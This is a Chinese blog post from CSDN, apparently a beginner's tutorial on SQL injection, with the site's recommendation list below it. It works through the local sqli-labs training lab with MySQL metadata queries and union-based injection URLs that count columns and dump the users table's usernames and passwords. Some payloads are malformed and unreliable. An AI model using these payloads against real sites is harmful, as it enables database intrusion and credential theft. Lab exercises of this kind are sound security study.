sql注入基本知识

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量669 收藏 1
点赞数 1
分类专栏: sql-lab 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Reme_mber/article/details/121528137
版权

文章目录


1、mysql在sql注入中的部分基本语句
2、sql常见注入

声明:
博主只是一个小白,如有不当之处请各位指正!

1、
首先介绍部分知识:
sql中注释:–+ 或 --(空格) 或 # 后面的语句不再执行
And和or:A and B 全部正确继续执行 A or B 有一正确或者全正确皆往下执行;
<1>
(1)显示所有数据库名

select schema_name from information_schema.schemata ;show databases;

结果
在这里插入图片描述
(2)显示某个库中所有表名(下图示例查询的是mysql库中的)

select table_name from information_schema.tables where table_schema='mysql' ;use mysql;
show tables;

结果
在这里插入图片描述
(3)显示某个表中所有列名(查询表中所有内容可用desc user(user为表名))

select column_name from information_schema.columns where table_name='user';

结果
在这里插入图片描述
(4)显示某个字段

select host,user from mysql.user;

结果
在这里插入图片描述
(5)显示当前版本号

select version();

在这里插入图片描述
<2>
(1)显示当前在用的数据库名:

select version();

结果
在这里插入图片描述
(2)显示当前在用的数据库名:

 select database();

结果
在这里插入图片描述
(3)显示当前使用的用户名:

 select user();

结果
在这里插入图片描述
(4)显示数据库路径

select @@datadir;

结果
在这里插入图片描述
(5)显示安装路径

select @@basedir;

结果
在这里插入图片描述
(6)显示数据库安装的操作系统

select @@version_compile_os;

结果
在这里插入图片描述

2、
注:初始的靶场是没有执行语句的,如果想要sql-libs输出sql语句,需要在每关的index.php文件中加上echo $sql;echo “<br>”;两句,具体插入位置见下图
在这里插入图片描述

(1)order by 语句
作用:用于判断字段数为多少
示例代码;

http://127.0.0.1:8080/sqli-labs-master/Less-1/?id=1' order by 4 --+

结果
在这里插入图片描述
当order by 3 时候 ,输出正常
在这里插入图片描述
据此可见,字段数为3
(2)查询数据库、表、值字段等具体内容
首先补充一些信息:
information_schema:记录当前mysql所有数据库名,表名,列名信息。
information_schema.tables:记录表名信息的表
information_schema.column:记录列名信息的表
Table_name:表名
column_name:列名
Table_schema:数据库名
select schema_name from information_schema.schemata 表示查询所有数据库的名字
数据库中 . 代表下一级的意思
[1]
在网站中查询数据库的操作

http://127.0.0.1:8080/sqli-labs-master/Less-2/?id=-1  group_concat(schema_name) from information_schema.schemata--+

实例如下:
输入语句
在这里插入图片描述

执行结果
在这里插入图片描述
[2]
在网站中查询某个表的操作
代码:

http://127.0.0.1:8080/sqli-labs-master/Less-2/?id=-1  group_concat(table_name) from information_schema.tables where table_schema=0xsecurity

网页输入代码:
在这里插入图片描述
注意,这里的0x是为了将后面的表名转换为16进制,转换过程如下
在这里插入图片描述
此时变成了
在这里插入图片描述
执行语句,结果为
在这里插入图片描述
或这样查询

http://127.0.0.1:8080/sqli-labs-master/Less-2/?id=-1  group_concat(table_name) from information_schema.tables where table_schema='security'

结果如下
在这里插入图片描述

[3]
查询某个表中所有字段的信息
代码

http://127.0.0.1:8080/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

网页中输入代码
在这里插入图片描述
执行结果
在这里插入图片描述
注:此亦可用单引号加表名来查看字段信息,我用的是转成十六进制的方法,由于[2]中已经讲述了单引号的用法,这里不再演示

[4]
查询某字段中的所有信息
代码:

http://127.0.0.1:8080/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--+

网页输入代码:
在这里插入图片描述
执行结果:
在这里插入图片描述
此知识仅为冰山万分之一角,后续还会扩充其中用到的函数等!

quan9i
关注
专栏目录
SQL注入基础知识
01-18
SQL注入基础知识的学习,可以对你有很大的帮助,避免在开发过程中出现更多的安全问题
sql注入基础知识
kevin_hjw的博客
07-04 571
一、原理   SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1791
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
SQL注入基本知识
qq_40254236的博客
08-18 212
SQL注入基本知识SQL注入基本知识如何预防(SQL)注入SQL注入攻击的严重性受到以下因素的限制 SQL注入基本知识 SQL注入是最常见得Web黑客技术。SQL注入攻击包括通过从客户端到应用程序的SQL查询输入来插入或“注入”恶意代码。如果处理不当,将这种代码注入应用程序可能会产生非常严重的影响,例如破坏数据完整和安全性。 当来自客户端的未经过滤的数据(例如 搜索字段的输入)进入应用程序本身的SQL解释器。如果未检查来自客户端的输入是否包含SQL命令,则黑客可以轻松地利用其基础SQL语句,以发挥其优势。
Sqli-labs之sql注入基础知识
weixin_30828379的博客
08-11 180
(1)注入的分类 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于如何处理输入的SQL查询(数据类型) •基于字符串 •数字或整数为基础的 基于程度和顺序的注入(哪里发生了影响) ★一阶注射 ★二阶注射 一阶注射是指输入的注射语句对WEB直接产...
sql注入讲解ppt.pptx
08-10
八、SQL 注入基本步骤: 1. 注入点测试:检测 SQL 注入的可能性。 2. 查询字段数:查询数据库中的字段数。 3. 判断回显位:判断回显位的类型和位置。 4. 查询数据库的基本信息:查询数据库的基本信息,如数据库名、...
SQL 注入天书.pdf
08-06
这部分从Background-1基础知识开始,涵盖了SQL注入基础概念,如SQL语法、查询结构和如何识别易受攻击的点。Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本...
sql注入字典fuzz
01-11
4. **教育与培训**:在网络安全教育和培训过程中,SQL注入字典作为教学资源的一部分,帮助学生了解和掌握SQL注入的基本原理和技术手段。 #### 六、结论 通过对SQL注入字典fuzz的详细解析,我们可以了解到SQL注入...
ASP.NET防止SQL注入的方法示例
01-20
首先,了解SQL注入的基本概念。SQL注入是当应用程序直接将用户提供的输入拼接到SQL查询中时发生的一种攻击。攻击者可以通过在表单字段、URL参数等处插入恶意SQL代码,来获取、修改、删除或控制数据库中的数据。例如...
SQL注入基本原理
DM766924的博客
09-09 3126
SQL注入基础原理: 1)SQL注入概念及产生原因: 当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2)SQL注入的本质: 把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则 3)SQL注入的两个关键点: 1,用户能控制输入的内容; 2,web应用把用户输入的内容带入到数据库执行; SQL注入基础危害: )盗取网站的敏感信息; )绕过网
sql注入基本知识
sun的博客
10-08 394
常见类型的sql注入: 我们看到的sql注入类题目经常包含直接在数据库的系统数据库类来得到信息,这个数据库的名字为information_schema这个数据库便是系统的数据库,用来存储我们创建的数据库和数据表的基本信息,而我接下来介绍的便是对这个数据库的认识。 我们可以查看information_schema这个数据库里有很多的数据表,我们经常要用到的数据表有: tables表: 这个表...
sql注入知识点整理(基础版)
07-21 196
sql注入知识点整理(基础版) 基本步骤 判断是否报错 判断闭合符号 判断注入类型 构建payload 手工注入或者编写脚本 基本注入类型 报错型注入 floor公式(结果多出一个1):and (select 1 from (select count(*),concat((payload),floor(...
sql注入必备知识
qq_25987491的博客
04-14 882
原文:https://blog.spoock.com/2016/06/28/sql-injection-1/mysql常用注释#--[空格]或者是--+/*…*/在注意过程中,这些注释可能都需要进行urlencodemysql认证绕过;%00‘ or 1=1 #‘ /*!or */ 1=1 --+mysql连接符mysql中使用+来进行连接。select * from users where us...
sql注入基础知识
whever的专栏
04-09 850
作者:混世魔王… 文章来源:swords某日,为了找个免费的asp.net空间我转悠到了站长之家http://www.yisou8.com,令人失望的是几条asp.net空间信息根本就没法用,浪费了偶的注册时间,怎“郁闷”两字了得?!于是,我决定帮忙监测一下网站有没有洞洞?很失望啊,很失望,在网站首页的所有潜在注入点都“试射”了一遍,没有发现一个可以利用的。郁闷之际,看到“美女图库”分栏目,决
新手上路 SQL注入基础知识
young‘s blog
08-09 423
在历尽千辛万苦之后终于把SQL注入的环境搭起来了,自己也能按照教程整两下了,现在先记录一下字符型搜索。等这个学完了再写一下怎么搭建的简单的平台~ 首先解决的是注入点查询语句实际上有多少个列名 用 order by语句 order by 语句是按照某一列进行排序,升序或降序,最简单的办法就是从1开始尝试,如果尝试到第n个发现提示你列不存在就存在n-1个列 简单方法:二分法。。这个有待验证...
[渗透测试笔记] 02.sql注入漏洞基础
H4ppyD0g的博客
08-19 474
select查询 从talbename表中查询所有字段 select * from tablename; 从talbename中查询columnname字段信息 select columnnmae from tablename; union联合查询 要注意union联合查询中的select所查询内容必须与前面的列数相同,并且对应的数据类型要兼容 union默认去重,如果需要查询全部,用uni...
SQL注入必备知识初级
地址ch3nye.top
02-26 6474
初学SQL注入的小白,整理一下必备的一些知识,数据库查询语句和一些PHP函数。 大部分来自W3school,详细内容请自行查询。 首先SQL语句对大小写不敏感,这也导致了后台程序对大小写的检测失效。 SQL 注释语句 ("--"与"/*...*/") (1)--:表示单行注释 (2)/*…*/:用于多行(块)注释 SELECT 查询语句 SQL SELE...
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 8426
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入攻击详解与防范
3. **防御SQL注入**:防止SQL注入的基本策略包括使用参数化查询(预编译语句)、输入验证、限制数据库权限、使用存储过程以及避免在代码中硬编码SQL语句等。 4. **SQL注入分类**:根据攻击方式,SQL注入可以分为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值